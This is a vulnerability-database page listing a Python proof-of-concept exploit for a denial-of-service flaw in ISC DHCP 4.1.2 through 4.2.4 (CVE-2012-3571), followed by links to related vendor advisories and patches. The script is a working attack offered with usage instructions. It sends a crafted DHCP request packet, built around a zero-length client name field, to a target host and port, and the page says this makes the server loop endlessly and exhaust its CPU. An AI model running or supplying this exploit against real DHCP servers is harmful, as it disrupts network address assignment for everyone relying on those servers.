Lucene search
K1P0DPACKETSTORM:115094HistoryJul 29, 2012 - 12:00 a.m.
SC DHCP 4.1.2 Denial Of Service
2012-07-2900:00:00
K1P0D
packetstormsecurity.com
17
0.082 Low
EPSS
Percentile
93.7%
`#!/usr/bin/python
'''
SC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of
service(infinite loop and CPU consumption/chew) via zero'ed client name length
http://www.k1p0d.com
'''
import socket
import getopt
from sys import argv
def main():
args = argv[1:]
try:
args, useless = getopt.getopt(args, 'p:h:')
args = dict(args)
args['-p']
args['-h']
except:
usage(argv[0])
exit(-1)
dhcp_req_packet = ('\x01\x01\x06\x00\x40\x00\x03\x6f'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x22\x5f\xae'
'\xa7\xdf\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x63\x82\x53\x63'
'\x35\x01\x03\x32\x04\x0a\x00\x00'
'\x01\x0c\x00'
'\x37\x0d\x01\x1c\x02\x03\x0f'
'\x06\x77\x0c\x2c\x2f\x1a\x79\x2a'
'\xff\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00\x00\x00\x00\x00'
'\x00\x00\x00\x00')
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.connect((args['-h'], int(args['-p'])))
sock.sendall(dhcp_req_packet)
print 'Packet sent'
sock.close()
def usage(pyname):
print '''
Usage: %s -h <host> -p <port>
''' % pyname
if __name__ == "__main__":
main()
`
Related
openvas
openvas
RedHat Update for dhcp RHSA-2012:1140-01
2012-08-03 00:00:00
RedHat Update for dhcp RHSA-2012:1140-01
2012-08-03 00:00:00
CentOS Update for dhclient CESA-2012:1140 centos5
2012-08-03 00:00:00
oraclelinux
oraclelinux
dhcp security update
2012-08-02 00:00:00
dhcp security update
2012-08-02 00:00:00
dhcp security and bug fix update
2013-02-22 00:00:00
nessus
nessus
RHEL 5 : dhcp (RHSA-2012:1140)
2012-08-03 00:00:00
Scientific Linux Security Update : dhcp on SL5.x i386/x86_64 (20120803)
2012-08-06 00:00:00
Oracle Linux 5 : dhcp (ELSA-2012-1140)
2013-07-12 00:00:00
redhat
redhat
(RHSA-2012:1140) Moderate: dhcp security update
2012-08-03 00:00:00
(RHSA-2012:1141) Moderate: dhcp security update
2012-08-03 00:00:00
(RHSA-2012:1185) Moderate: rhev-hypervisor5 security and bug fix update
2012-08-21 00:00:00
veracode
veracode
Denial Of Service (DoS)
2019-01-15 08:55:22
prion
prion
Design/Logic Flaw
2012-07-25 10:42:00
cve
cve
CVE-2012-3571
2012-07-25 10:42:00
debiancve
debiancve
CVE-2012-3571
2012-07-25 10:42:00
centos
centos
dhclient, dhcp, libdhcp4client security update
2012-08-03 04:02:49
dhclient, dhcp security update
2012-08-03 04:31:47
osv
osv
isc-dhcp - denial of service
2012-07-26 00:00:00
isc-dhcp - denial of service
2012-08-04 00:00:00
isc-dhcp - denial of service
2012-08-04 00:00:00
amazon
amazon
Medium: dhcp
2012-08-03 15:56:00
ubuntucve
ubuntucve
CVE-2012-3571
2012-07-25 00:00:00
debian
debian
[SECURITY] [DSA 2516-1] isc-dhcp security update
2012-07-26 11:40:40
[SECURITY] [DSA 2519-1] isc-dhcp security update
2012-08-01 18:34:11
[SECURITY] [DSA 2519-2] isc-dhcp regression
2012-08-04 11:10:27
ubuntu
ubuntu
DHCP vulnerabilities
2012-07-26 00:00:00
fedora
fedora
[SECURITY] Fedora 17 Update: dhcp-4.2.4-9.P1.fc17
2012-08-01 18:29:07
[SECURITY] Fedora 17 Update: dhcp-4.2.4-13.P2.fc17
2012-09-26 08:53:17
[SECURITY] Fedora 17 Update: dhcp-4.2.4-16.P2.fc17
2012-10-19 23:59:48
securityvulns
securityvulns
[ MDVSA-2012:115 ] dhcp
2012-07-29 00:00:00
ISC dhcp multiple security vulnerabilities
2012-09-18 00:00:00
freebsd
freebsd
isc-dhcp -- multiple vulnerabilities
2012-07-24 00:00:00
gentoo
gentoo
ISC DHCP: Denial of service
2013-01-09 00:00:00